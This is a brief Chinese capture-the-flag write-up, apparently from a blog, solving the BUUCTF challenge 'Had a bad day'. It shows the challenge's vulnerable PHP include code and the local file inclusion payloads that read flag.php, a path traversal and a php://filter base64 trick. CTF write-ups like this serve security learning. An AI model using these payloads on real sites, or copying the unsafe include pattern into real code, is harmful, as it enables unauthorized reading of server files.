本文分析了BUUCTF中Hadabadday挑战的解决过程,揭示了通过文件包含漏洞读取flag的方法。利用特定条件下的文件包含和php://filter伪协议,成功获取了flag信息。
BUUCTF:[BSidesCF 2020]Had a bad day
可能存在SQL注入或者文件包含,在我尝试读取index.php源码的时候出现了报错信息
的确是文件包含,但是有index.php却读取错误,报错显示无法打开流:操作失败在后面测试的时候,发现除掉后缀即可读取到源码
base64解码读取源码
<?php
$file = $_GET['category'];
if(isset($file))
{
if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" ) !== false || strpos( $file, "index")){
include ($file . '.php');
}
else{
echo "Sorry, we currently only support woofers and meowers.";
}
}
?>
传入的category需要有woofers,meowers,index才能包含传入以传入名为文件名的文件,我们要想办法包含flag.php
尝试直接读取/index.php?category=woofers/../flag
出现了别的内容,包含成功了flag.php,但是这里也说了flag需要读取
利用php://filter伪协议可以套一层协议读取flag.php
/index.php?category=php://filter/convert.base64-encode/index/resource=flag
套一个字符index符合条件并且传入flag,读取flag.php
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
